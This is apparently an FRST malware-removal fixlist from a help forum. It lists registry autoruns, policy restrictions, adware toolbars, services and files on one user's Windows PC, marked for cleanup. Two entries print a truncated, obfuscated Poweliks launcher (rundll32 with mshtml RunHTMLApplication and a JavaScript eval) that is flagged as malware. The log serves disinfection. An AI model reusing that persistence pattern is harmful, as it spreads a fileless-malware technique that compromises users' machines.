HKLM-x32\...\Run: [NWEReboot] => [X]
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-2526012750-3186116482-2568347101-1005 Group Policy restriction on software: %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot% <====== ATTENTION
HKU\S-1-5-21-2526012750-3186116482-2568347101-1005 Group Policy restriction on software: %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir% <====== ATTENTION
HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\RunOnce: [Adobe Speed Launcher] => 1418680399
HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\Policies\system: [LogonHoursAction] 2
HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\Policies\system: [DontDisplayLogonHoursWarnings] 1
HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\MountPoints2: {1825dfb8-901b-11df-ac7a-001bfcdb2b00} - F:\setup.exe -a
HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\MountPoints2: {1a642ce1-fa1b-11e2-a7cc-001bfcdb2b00} - H:\KDMElite.exe
HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\MountPoints2: {2ff0a168-70b4-11e4-bba4-001bfcdb2b00} - H:\VerizonSWUpgradeAssistantLauncher.exe
HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\MountPoints2: {40be6538-fd3f-11de-bc3d-001bfcdb2b00} - E:\Autoplay.exe -auto
HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\MountPoints2: {8ec01e68-0b46-11e4-90c1-001bfcdb2b00} - G:\MotoCastSetup.exe -a
HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\MountPoints2: {d39a215e-12aa-11e2-9a43-001bfcdb2b00} - G:\MotoCastSetup.exe -a
HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\MountPoints2: {f68261b2-e74c-11de-bc75-001bfcdb2b00} - F:\SETUP.EXE
HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
HKU\S-1-5-21-2526012750-3186116482-2568347101-1005\...\RunOnce: [Adobe Speed Launcher] => 1418684812
HKU\S-1-5-21-2526012750-3186116482-2568347101-1005\...\Policies\system: [LogonHoursAction] 2
HKU\S-1-5-21-2526012750-3186116482-2568347101-1005\...\Policies\system: [DontDisplayLogonHoursWarnings] 1
HKU\S-1-5-21-2526012750-3186116482-2568347101-1005\...\MountPoints2: {2ff0a168-70b4-11e4-bba4-001bfcdb2b00} - H:\VerizonSWUpgradeAssistantLauncher.exe
GroupPolicyUsers\S-1-5-21-2526012750-3186116482-2568347101-1005\User: Group Policy restriction detected <======= ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
SearchScopes: HKU\S-1-5-21-2526012750-3186116482-2568347101-1001 -> {5C64BA7A-11B0-4609-B099-C4FC0DA8D856} URL = http://search.avg.co...}&ychte=us&nt=1
SearchScopes: HKU\S-1-5-21-2526012750-3186116482-2568347101-1001 -> {95B7759C-8C7F-4BF1-B163-73684A933233} URL = https://mysearch.avg.com/search?cid={137244B2-7857-4E68-9CF5-46DD514DE27F}&mid=25e551794be5d82260c1c81e1e4b42aa-268e993bd84c66e058eb84a7569d70ada5bb6563&lang=en&ds=AVG&coid=avgtbavg&cmpid=1214tb&pr=fr&d=2014-02-05 21:32:45&v=18.2.0.829&pid=safeguard&sg=0&sap=dsp&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2526012750-3186116482-2568347101-1005 -> {95B7759C-8C7F-4BF1-B163-73684A933233} URL = https://mysearch.avg.com/search?cid={137244B2-7857-4E68-9CF5-46DD514DE27F}&mid=25e551794be5d82260c1c81e1e4b42aa-268e993bd84c66e058eb84a7569d70ada5bb6563&lang=en&ds=AVG&coid=avgtbavg&cmpid=1214tb&pr=fr&d=2014-02-05 21:32:45&v=18.2.0.829&pid=safeguard&sg=0&sap=dsp&q={searchTerms}
BHO-x32: ZD Manager IE Plugin -> {18D6D197-45BB-465B-ADC0-274A70B49B55} -> C:\Program Files (x86)\ZD Systems\ZD Manager\ZDManager.dll ()
C:\Program Files (x86)\ZD Systems
Toolbar: HKLM-x32 - No Name - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - No File
Toolbar: HKLM-x32 - No Name - {95B7759C-8C7F-4BF1-B163-73684A933233} - No File
Toolbar: HKU\S-1-5-21-2526012750-3186116482-2568347101-1001 -> No Name - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - No File
Toolbar: HKU\S-1-5-21-2526012750-3186116482-2568347101-1001 -> No Name - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - No File
Toolbar: HKU\S-1-5-21-2526012750-3186116482-2568347101-1001 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - No File
Toolbar: HKU\S-1-5-21-2526012750-3186116482-2568347101-1001 -> No Name - {C55BBCD6-41AD-48AD-9953-3609C48EACC7} - No File
Toolbar: HKU\S-1-5-21-2526012750-3186116482-2568347101-1001 -> No Name - {E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39} - No File
Toolbar: HKU\S-1-5-21-2526012750-3186116482-2568347101-1005 -> No Name - {E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39} - No File
FF Plugin-x32: @avg.com/AVG SiteSafety plugin,version=11.0.0.1,application/x-avg-sitesafety-plugin -> C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\18.2.0\\npsitesafety.dll No File
CHR HKLM\...\Chrome\Extension: [dbhjdbfgekjfcfkkfjjmlmojhbllhbho] - https://chrome.googl...jjmlmojhbllhbho [Not Found]
CHR HKLM-x32\...\Chrome\Extension: [bopakagnckmlgajfccecajhnimjiiedh] - No Path
CHR HKLM-x32\...\Chrome\Extension: [dbhjdbfgekjfcfkkfjjmlmojhbllhbho] - https://chrome.googl...jjmlmojhbllhbho [Not Found]
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe [289256 2014-04-09] (McAfee, Inc.)
R2 vToolbarUpdater18.2.0; C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.2.0\ToolbarUpdater.exe [1806872 2014-12-09] (AVG Secure Search)
S4 ZDManager Service; C:\Program Files (x86)\ZD Systems\ZD Manager\ZDManagerService.exe [176640 2012-11-07] () [File not signed]
U3 aq763zn8; C:\Windows\System32\Drivers\aq763zn8.sys [0 ] (Microsoft Corporation)
C:\Windows\System32\Drivers\aq763zn8.sys
2014-12-15 16:53 - 2014-12-15 16:53 - 00000000 ____D () C:\Users\Chris\AppData\Local\{982048E2-F993-44D8-B18F-A8FBDA99067E}
2014-12-05 08:29 - 2014-12-05 08:29 - 00000000 ____D () C:\Users\Chris\AppData\Local\{6D03B67E-B190-4D63-909C-23B037963DAF}
2014-11-29 14:21 - 2014-11-29 14:21 - 00000000 ____D () C:\Users\Chris\AppData\Local\{F90F4DEB-195B-453B-817C-C3825431B3D0}
2014-11-25 16:55 - 2014-11-25 16:55 - 00000000 ____D () C:\Users\Chris\AppData\Local\{37A3466C-5BD0-4F27-B793-690772C0A43F}
2014-12-13 07:19 - 2013-12-24 14:12 - 00000000 ____D () C:\ProgramData\VSO
2014-12-13 07:19 - 2013-12-24 14:12 - 00000000 ____D () C:\Program Files (x86)\VSO
2014-12-13 07:19 - 2009-12-30 21:00 - 00000055 _____ () C:\Users\Chris\AppData\Roaming\pcouffin.log
2014-12-13 07:19 - 2009-12-30 20:59 - 00099384 _____ () C:\Users\Chris\AppData\Roaming\inst.exe
2014-12-13 07:19 - 2009-12-30 20:59 - 00082816 _____ (VSO Software) C:\Users\Chris\AppData\Roaming\pcouffin.sys
2014-12-13 07:19 - 2009-12-30 20:59 - 00007859 _____ () C:\Users\Chris\AppData\Roaming\pcouffin.cat
2014-12-13 07:19 - 2009-12-30 20:59 - 00000000 ____D () C:\Users\Chris\AppData\Roaming\Vso
CustomCLSID: HKU\S-1-5-21-2526012750-3186116482-2568347101-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?
AlternateDataStreams: C:\ProgramData\TEMP:0B4227B4
C:\Program Files (x86)\AVG SafeGuard toolbar
2014-12-13 06:55 - 2009-12-10 21:46 - 00000000 ____D () C:\Users\Chris\AppData\Roaming\uTorrent
EmptyTemp: